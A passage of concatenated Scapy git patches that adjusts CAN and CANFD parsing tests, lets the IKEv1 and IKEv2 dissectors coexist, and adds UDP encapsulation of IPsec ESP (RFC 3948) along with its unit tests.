data=b'\x01\x0 sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) -packetsVCan1 = sock1.sniff(timeout=0.3, count=6) +packetsVCan1 = sock1.sniff(timeout=0.5, count=6) assert len(packetsVCan1) == 6 sock0.close() @@ -415,7 +415,7 @@ sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x0 sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) -packetsVCan0 = sock0.sniff(timeout=0.3, count=4) +packetsVCan0 = sock0.sniff(timeout=0.5, count=4) assert len(packetsVCan0) == 4 sock0.close() @@ -459,8 +459,8 @@ sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x0 sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) -packetsVCan0 = sock0.sniff(timeout=0.3, count=4) -packetsVCan1 = sock1.sniff(timeout=0.3, count=6) +packetsVCan0 = sock0.sniff(timeout=0.5, count=4) +packetsVCan1 = sock1.sniff(timeout=0.5, count=6) assert len(packetsVCan0) == 4 assert len(packetsVCan1) == 6 @@ -482,7 +482,7 @@ def bridgeWithRemovePackageFromVCan0ToVCan1(): bSock1 = CANSocket(bustype='socketcan', channel='vcan1') def pnr(pkt): if(pkt.identifier == 0x10020000): - pkt = None + pkt = False else: pkt = pkt return pkt @@ -503,7 +503,7 @@ sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x0 sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) -packetsVCan1 = sock1.sniff(timeout=0.3, count=5) +packetsVCan1 = sock1.sniff(timeout=0.5, count=5) assert len(packetsVCan1) == 5 @@ -525,7 +525,7 @@ def bridgeWithRemovePackageFromVCan1ToVCan0(): bSock1 = CANSocket(bustype='socketcan', channel='vcan1') def pnr(pkt): if(pkt.identifier == 0x10050000): - pkt = None + pkt = False else: pkt = pkt return pkt @@ -544,7 +544,7 @@ sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x0 sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) -packetsVCan0 = sock0.sniff(timeout=0.3, count=3) +packetsVCan0 = sock0.sniff(timeout=0.5, count=3) assert len(packetsVCan0) == 3 @@ -567,13 +567,13 @@ def bridgeWithRemovePackageInBothDirections(): bSock1 = CANSocket(bustype='socketcan', channel='vcan1') def pnrA(pkt): if(pkt.identifier == 0x10020000): - pkt = None + pkt = False else: pkt = pkt return pkt def pnrB(pkt): if (pkt.identifier == 0x10050000): - pkt = None + pkt = False else: pkt = pkt return pkt @@ -598,8 +598,8 @@ sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x0 sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) -packetsVCan0 = sock0.sniff(timeout=0.3, count=3) -packetsVCan1 = sock1.sniff(timeout=0.3, count=5) +packetsVCan0 = sock0.sniff(timeout=0.5, count=3) +packetsVCan1 = sock1.sniff(timeout=0.5, count=5) assert len(packetsVCan0) == 3 assert len(packetsVCan1) == 5 diff --git a/test/contrib/isotp_native_socket.uts b/test/contrib/isotp_native_socket.uts index 62d7dd8db1a..55a815f6ccf 100644 --- a/test/contrib/isotp_native_socket.uts +++ b/test/contrib/isotp_native_socket.uts @@ -356,6 +356,17 @@ with ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) as s: assert isotp.data == dhex("01 02 03 04 05 06 07 08 09 10 11") += Send single CANFD frame ISOTP message +exit_if_no_isotp_module() + +with new_can_socket(iface0, fd=True) as cans: + s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, fd=True) + s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08 09"))) + can = cans.sniff(timeout=1, count=1)[0] + assert can.identifier == 0x641 + assert can.data == dhex("09 01 02 03 04 05 06 07 08 09") + + = ISOTP Socket sr1 test exit_if_no_isotp_module() diff --git a/test/pcaps/canfd.pcap.gz b/test/pcaps/canfd.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..f4349b4f9f98e02a39b2b528179ef6d4f8f06501 GIT binary patch literal 109 zcmV-z0FwV7iwFoNv1Vfc17l%sW@IjKV_|RryK;EbLM8?l1_WSXC^T9n=WHM^&HV$i=Q6TA PH1ZDs3{N6@xB&nFXu~KP literal 0 HcmV?d00001 diff --git a/test/scapy/layers/can.uts b/test/scapy/layers/can.uts index 04e19bf68c5..5fb1cc09bbb 100644 --- a/test/scapy/layers/can.uts +++ b/test/scapy/layers/can.uts @@ -67,6 +67,19 @@ assert set(pkt.flags for pkt in packets) == {0} set(pkt.length for pkt in packets) == {1, 2, 8} += read PCAP of a CookedLinux/SocketCAN capture with CANFD frames + +conf.contribs['CAN']['swap-bytes'] = True + +packets = rdpcap(scapy_path("/test/pcaps/canfd.pcap.gz")) + += Check if parsing worked: each packet has a CANFD layer + +assert all(CANFD in pkt[1] for pkt in packets) + +assert all(pkt.identifier == 0x123 for pkt in packets) +assert len(packets) == 4 + ############ ############ @@ -134,9 +147,11 @@ pcap_fd = BytesIO(b'''(1539191392.761779) vcan0 123#11223344 (1539191494.084177) vcan0 1F334455#1122334455667788 (1539191494.724228) vcan0 1F334455#1122334455667788 (1539191495.148182) vcan0 1F334455#1122334455667788 - (1539191495.563320) vcan0 1F334455#1122334455667788''') + (1539191495.563320) vcan0 1F334455#1122334455667788 + (1539191470.820239) vcan0 123##1112233445566778899aabbccddeeff + (1539191495.563320) vcan0 1F334455##1112233445566778899aabbccddeeff''') packets = rdcandump(pcap_fd) -assert len(packets) == 9 +assert len(packets) == 11 assert packets[0].identifier == 0x123 assert packets[8].identifier == 0x1F334455 assert packets[8].flags == 0b100 @@ -144,6 +159,10 @@ assert packets[0].length == 4 assert packets[8].length == 8 assert packets[0].data == b'\x11\x22\x33\x44' assert packets[8].data == b'\x11\x22\x33\x44\x55\x66\x77\x88' +assert packets[9].identifier == 0x123 +assert packets[10].identifier == 0x1F334455 +assert packets[9].data == b'\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\xcc\xdd\xee\xff' +assert packets[10].data == b'\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\xcc\xdd\xee\xff' = Check rdcandump_iterable default * default reading @@ -155,9 +174,11 @@ pcap_fd = BytesIO(b'''(1539191392.761779) vcan0 123#11223344 (1539191494.084177) vcan0 1F334455#1122334455667788 (1539191494.724228) vcan0 1F334455#1122334455667788 (1539191495.148182) vcan0 1F334455#1122334455667788 - (1539191495.563320) vcan0 1F334455#1122334455667788''') + (1539191495.563320) vcan0 1F334455#1122334455667788 + (1539191470.820239) vcan0 123##1112233445566778899aabbccddeeff + (1539191495.563320) vcan0 1F334455##1112233445566778899aabbccddeeff''') packets = [x for x in CandumpReader(pcap_fd)] -assert len(packets) == 9 +assert len(packets) == 11 assert packets[0].identifier == 0x123 assert packets[8].identifier == 0x1F334455 assert packets[8].flags == 0b100 @@ -165,6 +186,10 @@ assert packets[0].length == 4 assert packets[8].length == 8 assert packets[0].data == b'\x11\x22\x33\x44' assert packets[8].data == b'\x11\x22\x33\x44\x55\x66\x77\x88' +assert packets[9].identifier == 0x123 +assert packets[10].identifier == 0x1F334455 +assert packets[9].data == b'\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\xcc\xdd\xee\xff' +assert packets[10].data == b'\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\xcc\xdd\xee\xff' = Check rdcandump filter * interface filter 1 @@ -249,20 +274,27 @@ pcap_fd = BytesIO(b''' vcan0 1F334455 [8] 11 22 33 44 55 66 77 88 vcan0 1F3 [8] 11 22 33 44 55 66 77 88 vcan0 1F334455 [8] 11 22 33 44 55 66 77 88 vcan0 1F334455 [4] 11 22 33 44 - vcan0 1F3 [4] 11 22 33 44''') + vcan0 1F3 [4] 11 22 33 44 + vcan0 1F334455 [09] 11 22 33 44 55 66 77 88 99 + vcan0 1F3 [09] 11 22 33 44 55 66 77 88 99 + ''') packets = rdcandump(pcap_fd) -assert len(packets) == 8 +assert len(packets) == 10 packets[-1].show() -assert packets[-1].identifier == 0x1F3 +assert packets[-3].identifier == 0x1F3 assert packets[1].identifier == 0x1F3 assert packets[0].identifier == 0x1F334455 assert packets[0].flags == 0b100 -assert packets[-1].length == 4 +assert packets[-3].length == 4 assert packets[0].length == 8 assert packets[1].length == 8 -assert packets[-1].data == b'\x11\x22\x33\x44' +assert packets[-1].length == 9 +assert packets[8].length == 9 +assert packets[-3].data == b'\x11\x22\x33\x44' assert packets[0].data == b'\x11\x22\x33\x44\x55\x66\x77\x88' assert packets[1].data == b'\x11\x22\x33\x44\x55\x66\x77\x88' +assert packets[8].data == b'\x11\x22\x33\x44\x55\x66\x77\x88\x99' +assert packets[-1].data == b'\x11\x22\x33\x44\x55\x66\x77\x88\x99' = interface not log file format filtered 1 pcap_fd = BytesIO(b''' vcan0 1F334455 [8] 11 22 33 44 55 66 77 88 @@ -273,19 +305,24 @@ pcap_fd = BytesIO(b''' vcan0 1F334455 [8] 11 22 33 44 55 66 77 88 vcan1 1F334455 [8] 11 22 33 44 55 66 77 88 vcan1 1F334455 [4] 11 22 33 44 vcan0 1F3 [4] 11 22 33 44 + vcan0 1F334455 [09] 11 22 33 44 55 66 77 88 99 + vcan1 1F3 [09] 11 22 33 44 55 66 77 88 99 ''') packets = rdcandump(pcap_fd, interface="vcan0") -assert len(packets) == 4 -assert packets[-1].identifier == 0x1F3 +assert len(packets) == 5 +assert packets[-2].identifier == 0x1F3 assert packets[2].identifier == 0x1F3 assert packets[0].identifier == 0x1F334455 +assert packets[-1].identifier == 0x1F334455 assert packets[0].flags == 0b100 -assert packets[-1].length == 4 +assert packets[-2].length == 4 assert packets[0].length == 8 assert packets[2].length == 8 -assert packets[-1].data == b'\x11\x22\x33\x44' +assert packets[-1].length == 9 +assert packets[-2].data == b'\x11\x22\x33\x44' assert packets[0].data == b'\x11\x22\x33\x44\x55\x66\x77\x88' assert packets[2].data == b'\x11\x22\x33\x44\x55\x66\x77\x88' +assert packets[-1].data == b'\x11\x22\x33\x44\x55\x66\x77\x88\x99' = interface not log file format filtered 2 @@ -385,9 +422,10 @@ pcap_fd = BytesIO(b'''(1539191392.761779) vcan0 123#11223344 (1539191494.084177) vcan0 00000055#1122334455667788 (1539191494.724228) vcan0 00000055#1122334455667788 (1539191495.148182) vcan0 00000055#1122334455667788 - (1539191495.563320) vcan0 00000055#1122334455667788''') + (1539191495.563320) vcan0 00000055#1122334455667788 + (1539191494.724228) vcan0 00000055##1112233445566778899''') packets = rdcandump(pcap_fd) -assert len(packets) == 9 +assert len(packets) == 10 assert packets[0].identifier == 0x123 assert packets[8].identifier == 0x55 assert packets[8].flags == 0b100 @@ -395,6 +433,10 @@ assert packets[0].length == 4 assert packets[8].length == 8 assert packets[0].data == b'\x11\x22\x33\x44' assert packets[8].data == b'\x11\x22\x33\x44\x55\x66\x77\x88' +assert packets[8].identifier == 0x55 +assert packets[8].flags == 0b100 +assert packets[9].length == 9 +assert packets[9].data == b'\x11\x22\x33\x44\x55\x66\x77\x88\x99' = interface not log file format From ca97fd84297d67a9f05c7569e5e83909a27f4e30 Mon Sep 17 00:00:00 2001 From: "Dr. Matthias St. Pierre" Date: Fri, 21 Oct 2022 23:56:33 +0200 Subject: [PATCH 0914/1632] Implement coexistence of IKEv1 and IKEv2 Previously, it was not possible to dissect IKEv1 and IKEv2 packets at the same time, loading `scapy.contrib.ikev2` manually broke (replaced) the ISAKMP bindings. This commit fixes the problem by adding a dispatch hook to the IKEv2 layer which switches between ISAKMP and IKEv2 based on the protocol version. It also removes port 4500(ipsec_nat_t) as lower binding from IKEv2 to UDP, which breaks the binding for UDP-encapsulated ESP. One of the unit tests had to be adjusted to match this change. --- scapy/contrib/ikev2.py | 26 ++++++++++++++++++++------ scapy/layers/isakmp.py | 4 ++-- test/contrib/ikev2.uts | 11 ++++++++--- 3 files changed, 30 insertions(+), 11 deletions(-) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 137b8b63895..396deb6f491 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -2,7 +2,11 @@ # This file is part of Scapy # See https://scapy.net/ for more information -# scapy.contrib.description = Internet Key Exchange v2 (IKEv2) +""" +Internet Key Exchange Protocol Version 2 (IKEv2), RFC 7296 +""" + +# scapy.contrib.description = Internet Key Exchange Protocol Version 2 (IKEv2), RFC 7296 # scapy.contrib.status = loads import logging @@ -11,7 +15,7 @@ # Modified from the original ISAKMP code by Yaron Sheffer , June 2010. # noqa: E501 -from scapy.packet import Packet, bind_layers, split_layers, Raw +from scapy.packet import Packet, bind_top_down, bind_bottom_up, split_bottom_up, Raw from scapy.fields import ByteEnumField, ByteField, ConditionalField, \ FieldLenField, FlagsField, IP6Field, IPField, IntField, MultiEnumField, \ PacketField, PacketLenField, PacketListField, ShortEnumField, ShortField, \ @@ -420,6 +424,14 @@ class IKEv2(IKEv2_class): # rfc4306 IntField("length", None) # Length of total message: packets + all payloads # noqa: E501 ] + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 18: + version = struct.unpack("!B", _pkt[17:18])[0] + if version < 0x20: + return ISAKMP + return cls + def guess_payload_class(self, payload): if self.flags & 1: return conf.raw_layer @@ -798,11 +810,13 @@ class IKEv2_payload_CERT_STR(IKEv2_payload_CERT): del i, payloadname, name IKEv2_class._overload_fields = IKEv2_payload_type_overload.copy() -split_layers(UDP, ISAKMP, sport=500) -split_layers(UDP, ISAKMP, dport=500) +# the upper bindings for port 500 to ISAKMP are handled by IKEv2.dispatch_hook +split_bottom_up(UDP, ISAKMP, dport=500) +split_bottom_up(UDP, ISAKMP, sport=500) -bind_layers(UDP, IKEv2, dport=500, sport=500) # TODO: distinguish IKEv1/IKEv2 -bind_layers(UDP, IKEv2, dport=4500, sport=4500) +bind_bottom_up(UDP, IKEv2, dport=500) +bind_bottom_up(UDP, IKEv2, sport=500) +bind_top_down(UDP, IKEv2, dport=500, sport=500) def ikev2scan(ip, **kwargs): diff --git a/scapy/layers/isakmp.py b/scapy/layers/isakmp.py index 8726f3ee08a..05f1d504bfb 100644 --- a/scapy/layers/isakmp.py +++ b/scapy/layers/isakmp.py @@ -12,7 +12,7 @@ from __future__ import absolute_import import struct from scapy.config import conf -from scapy.packet import Packet, bind_bottom_up, bind_top_down, bind_layers +from scapy.packet import Packet, bind_bottom_up, bind_top_down from scapy.compat import chb from scapy.fields import ByteEnumField, ByteField, FieldLenField, FlagsField, \ IntEnumField, IntField, PacketLenField, ShortEnumField, ShortField, \ @@ -324,7 +324,7 @@ class ISAKMP_payload_Hash(ISAKMP_payload): bind_bottom_up(UDP, ISAKMP, dport=500) bind_bottom_up(UDP, ISAKMP, sport=500) -bind_layers(UDP, ISAKMP, dport=500, sport=500) +bind_top_down(UDP, ISAKMP, dport=500, sport=500) # Add building bindings # (Dissection bindings are located in ISAKMP_class.guess_payload_class) diff --git a/test/contrib/ikev2.uts b/test/contrib/ikev2.uts index a29ed5de879..c6c04d5e9ab 100644 --- a/test/contrib/ikev2.uts +++ b/test/contrib/ikev2.uts @@ -1,4 +1,9 @@ -% Ikev2 Tests +% Ikev2 unit tests +# +# Type the following command to launch start the tests: +# $ test/run_tests -P "load_contrib('ikev2')" -t test/contrib/ikev2.uts + + * Tests for the Ikev2 layer + Basic Layer Tests @@ -47,7 +52,7 @@ packet = IP(dst = '192.168.1.10', src = '192.168.1.130') /\ IKEv2_payload_Notify(next_payload = 'Notify', type = 16388, load = nat_detection_source_ip) /\ IKEv2_payload_Notify(next_payload = 'None', type = 16389, load = nat_detection_destination_ip) -assert raw(packet) == b'E\x00\x01L\x00\x01\x00\x00@\x11\xf5\xc3\xc0\xa8\x01\x82\xc0\xa8\x01\n\x11\x94\x01\xf4\x018\x97 KWdxMhjA\x00\x00\x00\x00\x00\x00\x00\x00! "\x08\x00\x00\x00\x00\x00\x00\x010"\x00\x000\x00\x00\x00,\x01\x01\x00\x04\x03\x00\x00\x0c\x01\x00\x00\x0c\x80\x0e\x00\x80\x03\x00\x00\x08\x02\x00\x00\x02\x03\x00\x00\x08\x03\x00\x00\x02\x00\x00\x00\x08\x04\x00\x00\x02(\x00\x00\x88\x00\x02\x00\x00\xbbA\xbbA\xcf\xaf4\xe3\xb3 \x96r\xae\xf1\xc5\x1b\x9dR\x91\x9f\x17\x81\xd0\xb4\xcd\x88\x9dJ\xaf\xe2ah\x87v\x00\x0c=\x901PZ\xef\xc0\x18ig\xea\xf5\xa7f7%\xfb\x10,Y\xc3\x9bzp\xd8\xd9\x16\x1c;\xd0\xebDX\x88\xb5\x02\x8e\xa0c\xba\n\xe0\x1f[?0\x80\x8akg\x10\xdc\x9b\xab`\x1eA\x16\x15}\x7fX\xcf\x83\\\xb63\xc6J\xbc\xb3\xa5\xc6\x1c">\x932S\x8b\xfc\x9f(,\xb6-\x1f\x00\xf4\xee\x88\x02)\x00\x00$\x8d\xfc\xf88L\\2\xf1\xb2\x94\xc6N\xabi\xf9\x8e\x9d\x8c\xf7\xe7\xf3R\x97\x1a\x91\xffgw\xd4}\xff\xed)\x00\x00\x1c\x00\x00@\x04\xe6L\x81\xc4\x15*\xd8;\xd6\xe05\x00\x9f\xbb\x90\x04\x06\xbe7\x1f\x00\x00\x00\x1c\x00\x00@\x05(\xcd\x99\xb9\xfa\x12geKS\xf6\x08\x87\xc9\xc3[\xcfg\xa8\xff' +assert raw(packet) == b'E\x00\x01L\x00\x01\x00\x00@\x11\xf5\xc3\xc0\xa8\x01\x82\xc0\xa8\x01\n\x01\xf4\x01\xf4\x018\xa6\xc0KWdxMhjA\x00\x00\x00\x00\x00\x00\x00\x00! "\x08\x00\x00\x00\x00\x00\x00\x010"\x00\x000\x00\x00\x00,\x01\x01\x00\x04\x03\x00\x00\x0c\x01\x00\x00\x0c\x80\x0e\x00\x80\x03\x00\x00\x08\x02\x00\x00\x02\x03\x00\x00\x08\x03\x00\x00\x02\x00\x00\x00\x08\x04\x00\x00\x02(\x00\x00\x88\x00\x02\x00\x00\xbbA\xbbA\xcf\xaf4\xe3\xb3 \x96r\xae\xf1\xc5\x1b\x9dR\x91\x9f\x17\x81\xd0\xb4\xcd\x88\x9dJ\xaf\xe2ah\x87v\x00\x0c=\x901PZ\xef\xc0\x18ig\xea\xf5\xa7f7%\xfb\x10,Y\xc3\x9bzp\xd8\xd9\x16\x1c;\xd0\xebDX\x88\xb5\x02\x8e\xa0c\xba\n\xe0\x1f[?0\x80\x8akg\x10\xdc\x9b\xab`\x1eA\x16\x15}\x7fX\xcf\x83\\\xb63\xc6J\xbc\xb3\xa5\xc6\x1c">\x932S\x8b\xfc\x9f(,\xb6-\x1f\x00\xf4\xee\x88\x02)\x00\x00$\x8d\xfc\xf88L\\2\xf1\xb2\x94\xc6N\xabi\xf9\x8e\x9d\x8c\xf7\xe7\xf3R\x97\x1a\x91\xffgw\xd4}\xff\xed)\x00\x00\x1c\x00\x00@\x04\xe6L\x81\xc4\x15*\xd8;\xd6\xe05\x00\x9f\xbb\x90\x04\x06\xbe7\x1f\x00\x00\x00\x1c\x00\x00@\x05(\xcd\x99\xb9\xfa\x12geKS\xf6\x08\x87\xc9\xc3[\xcfg\xa8\xff' ## packets taken from ## https://github.com/wireshark/wireshark/blob/master/test/captures/ikev2-decrypt-aes128ccm12.pcap @@ -68,7 +73,7 @@ assert b[IKEv2_payload_KE].load == b',f\xbe\xad\xb6\xce\x855\xd6!\x8c\xb4\x01\xa assert b[IKEv2_payload_Nonce].payload.type == 16388 assert b[IKEv2_payload_Nonce].payload.payload.payload.next_payload == 0 -= Dissect Encrypted Inititor Request += Dissect Encrypted Initiator Request a = Ether(b"\x00!k\x91#H\xb8'\xeb\xa6XI\x08\x00E\x00\x00Yu\xe2@\x00@\x11AQ\xc0\xa8\x01\x02\xc0\xa8\x01\x0e\x01\xf4\x01\xf4\x00E}\xe0\xeahM!Yz\xfd6\xd9\xfe*\xb2-\xac#\xac. %\x08\x00\x00\x00\x02\x00\x00\x00=*\x00\x00!\xcc\xa0\xb3]\xe5\xab\xc5\x1c\x99\x87\xcb\xf1\xf5\xec\xff!\x0e\xb7g\xcd\xb8Qy8;\x96Mx\xe2") assert a[IKEv2_payload_Encrypted].next_payload == 42 From 39e803aa3c07817277f528226228520f218a7918 Mon Sep 17 00:00:00 2001 From: "Dr. Matthias St. Pierre" Date: Thu, 3 Nov 2022 14:43:32 +0100 Subject: [PATCH 0915/1632] Implement UDP encapsulation of IPsec ESP packets [RFC 3948] UDP encapsulation of IPsec ESP packets is used for NAT-traversal on port 4500(ipsec-nat-t). Previously, the dissector assumed that all traffic on port 4500 was UDP encapsulated ESP only. This commit introduces a new UDP_ENCAP Packet which selects the correct packet format for the payload as specified in the RFC. Note that the implementation works for both IKEv1 (ISAKMP) and IKEv2, but only after the 'scapy.contrib.ikev2' module is loaded. Creating default NAT-T bindings for ISAKMP only and rebinding them to IKEv2 when its loaded was just too ugly and painful. NAT-T support by default for all IKE versions will be available as soon as IKEv2 is promoted to official scapy layer. --- scapy/contrib/ikev2.py | 64 ++++++++++++++++++++++++++++++++++++++++-- scapy/layers/ipsec.py | 4 +-- 2 files changed, 64 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index 396deb6f491..60269176f99 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -15,13 +15,15 @@ # Modified from the original ISAKMP code by Yaron Sheffer , June 2010. # noqa: E501 -from scapy.packet import Packet, bind_top_down, bind_bottom_up, split_bottom_up, Raw +from scapy.packet import Packet, bind_top_down, bind_bottom_up, \ + split_bottom_up, split_layers, Raw from scapy.fields import ByteEnumField, ByteField, ConditionalField, \ FieldLenField, FlagsField, IP6Field, IPField, IntField, MultiEnumField, \ PacketField, PacketLenField, PacketListField, ShortEnumField, ShortField, \ - StrFixedLenField, StrLenField, X3BytesField, XByteField + StrFixedLenField, StrLenField, X3BytesField, XByteField, XIntField from scapy.layers.x509 import X509_Cert, X509_CRL from scapy.layers.inet import IP, UDP +from scapy.layers.ipsec import ESP from scapy.layers.isakmp import ISAKMP from scapy.sendrecv import sr from scapy.config import conf @@ -819,6 +821,64 @@ class IKEv2_payload_CERT_STR(IKEv2_payload_CERT): bind_top_down(UDP, IKEv2, dport=500, sport=500) +split_layers(UDP, ESP, dport=4500) # NAT-Traversal encapsulation +split_layers(UDP, ESP, sport=4500) # NAT-Traversal encapsulation + + +# TODO: the bindings for NAT-traversal (UDP encapsulation on port 4500) +# actually belong into the scapy.layers.ipsec module. They will +# be moved there as soon as the IKEv2 protocol has been promoted +# from scapy.contrib to scapy.layers. + +class UDP_ENCAP(Packet): # RFC 3948 + """ + UDP Encapsulation of IPsec ESP Packets [RFC3948] (for NAT-Traversal) + """ + name = 'UDP_ENCAP' + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt: + if len(_pkt) >= 4 and struct.unpack("!I", _pkt[0:4])[0] == 0x00: + return NON_ESP + elif len(_pkt) == 1 and struct.unpack("!B", _pkt)[0] == 0xff: + return NAT_KEEPALIVE + else: + return ESP + return cls + + +class NON_ESP(Packet): # RFC 3948, section 2.2 + + fields_desc = [ + XIntField("non_esp", 0x0) + ] + + def guess_payload_class(self, payload): + return IKEv2 + + +class NAT_KEEPALIVE(Packet): # RFC 3948, section 2.2 + + fields_desc = [ + XByteField("nat_keepalive", 0xFF) + ] + + def guess_payload_class(self, payload): + return conf.raw_layer + + +split_layers(UDP, ESP, dport=4500) +split_layers(UDP, ESP, sport=4500) + +bind_bottom_up(UDP, UDP_ENCAP, dport=4500) +bind_bottom_up(UDP, UDP_ENCAP, sport=4500) + +bind_top_down(UDP, ESP, dport=4500, sport=4500) +bind_top_down(UDP, NON_ESP, dport=4500, sport=4500) +bind_top_down(UDP, NAT_KEEPALIVE, dport=4500, sport=4500) + + def ikev2scan(ip, **kwargs): """Send a IKEv2 SA to an IP and wait for answers.""" return sr(IP(dst=ip) / UDP() / IKEv2(init_SPI=RandString(8), diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 162d5aa971a..712c5d2cda2 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -78,7 +78,7 @@ def __get_icv_len(self): ByteEnumField('nh', None, IP_PROTOS), ByteField('payloadlen', None), ShortField('reserved', None), - XIntField('spi', 0x0), + XIntField('spi', 0x00000001), IntField('seq', 0), XStrLenField('icv', None, length_from=__get_icv_len), # Padding len can only be known with the SecurityAssociation.auth_algo @@ -111,7 +111,7 @@ class ESP(Packet): name = 'ESP' fields_desc = [ - XIntField('spi', 0x0), + XIntField('spi', 0x00000001), IntField('seq', 0), XStrField('data', None), ] From 53eb1acac5bab0a56773a30b0cc6e2b31aea6677 Mon Sep 17 00:00:00 2001 From: "Dr. Matthias St. Pierre" Date: Sun, 23 Oct 2022 23:01:55 +0200 Subject: [PATCH 0916/1632] Test UDP encapsulation of IPsec ESP packets Simple tests: * Build and dissect UDP encapsulated IKEv1 packets * Build and dissect UDP encapsulated IKEv2 packets * Build and dissect UDP encapsulated ESP packets * Build and dissect UDP encapsulated NAT-keepalive packets Advanced tests: * IKEv2 keyexchange with NAT-traversal - IKE_SA_INIT request - IKE_SA_INIT response - IKE_AUTH request - IKE_AUTH response Loads and dissects the four frames of an IKEv2 key exchange on port 4500(ipsec-nat-t) from a Wireshark capture and compares them with manually built Scapy packets. --- test/contrib/ikev2.uts | 565 ++++++++++++++++++++++++++++++++++ test/pcaps/ikev2_nat_t.pcapng | Bin 0 -> 18476 bytes 2 files changed, 565 insertions(+) create mode 100644 test/pcaps/ikev2_nat_t.pcapng diff --git a/test/contrib/ikev2.uts b/test/contrib/ikev2.uts index c6c04d5e9ab..ace7c1dc425 100644 --- a/test/contrib/ikev2.uts +++ b/test/contrib/ikev2.uts @@ -147,3 +147,568 @@ assert raw(IKEv2_payload_Encrypted_Fragment()) == s p = IKEv2_payload_Encrypted_Fragment(s) assert p.length == 8 and p.frag_number == 1 + + += Build and dissect UDP encapsulated IKEv1 packets + +pkt = Ether() / IP() / UDP() / NON_ESP() / ISAKMP(init_cookie = b'\x01\x02\x03\x04\x05\x06\x07\x08', resp_cookie = b'\x08\x07\x06\x05\x04\x03\x02\x01') +pkt.show() +assert pkt[UDP].sport == 4500 +assert pkt[UDP].dport == 4500 +assert pkt[NON_ESP].non_esp == 0x00 +assert pkt[ISAKMP].version == 0x10 +assert pkt[ISAKMP].init_cookie == b'\x01\x02\x03\x04\x05\x06\x07\x08' +assert pkt[ISAKMP].resp_cookie == b'\x08\x07\x06\x05\x04\x03\x02\x01' + +pkt = Ether(raw(pkt)) +pkt.show() +assert pkt[UDP].sport == 4500 +assert pkt[UDP].dport == 4500 +assert pkt[NON_ESP].non_esp == 0x00 +assert pkt[ISAKMP].version == 0x10 +assert pkt[ISAKMP].init_cookie == b'\x01\x02\x03\x04\x05\x06\x07\x08' +assert pkt[ISAKMP].resp_cookie == b'\x08\x07\x06\x05\x04\x03\x02\x01' + + +# the IKEv1 and IKEv2 headers are compatible, so changing the version to 0x02... +pkt[ISAKMP].version = 0x20 +# ...should turn the ISAKMP packet into an IKEv2 packet after building and dissecting +pkt = Ether(raw(pkt)) +pkt.show() +assert pkt[UDP].sport == 4500 +assert pkt[UDP].dport == 4500 +assert pkt[NON_ESP].non_esp == 0x00 +assert pkt[IKEv2].version == 0x20 +assert pkt[IKEv2].init_SPI == b'\x01\x02\x03\x04\x05\x06\x07\x08' +assert pkt[IKEv2].resp_SPI == b'\x08\x07\x06\x05\x04\x03\x02\x01' + + += Build and dissect UDP encapsulated IKEv2 packets + +pkt = Ether() / IP() / UDP() / NON_ESP() / IKEv2(init_SPI = b'\x01\x02\x03\x04\x05\x06\x07\x08', resp_SPI = b'\x08\x07\x06\x05\x04\x03\x02\x01') +pkt.show() +assert pkt[UDP].sport == 4500 +assert pkt[UDP].dport == 4500 +assert pkt[NON_ESP].non_esp == 0x00 +assert pkt[IKEv2].version == 0x20 +assert pkt[IKEv2].init_SPI == b'\x01\x02\x03\x04\x05\x06\x07\x08' +assert pkt[IKEv2].resp_SPI == b'\x08\x07\x06\x05\x04\x03\x02\x01' + +pkt = Ether(raw(pkt)) +pkt.show() +assert pkt[UDP].sport == 4500 +assert pkt[UDP].dport == 4500 +assert pkt[NON_ESP].non_esp == 0x00 +assert pkt[IKEv2].version == 0x20 +assert pkt[IKEv2].init_SPI == b'\x01\x02\x03\x04\x05\x06\x07\x08' +assert pkt[IKEv2].resp_SPI == 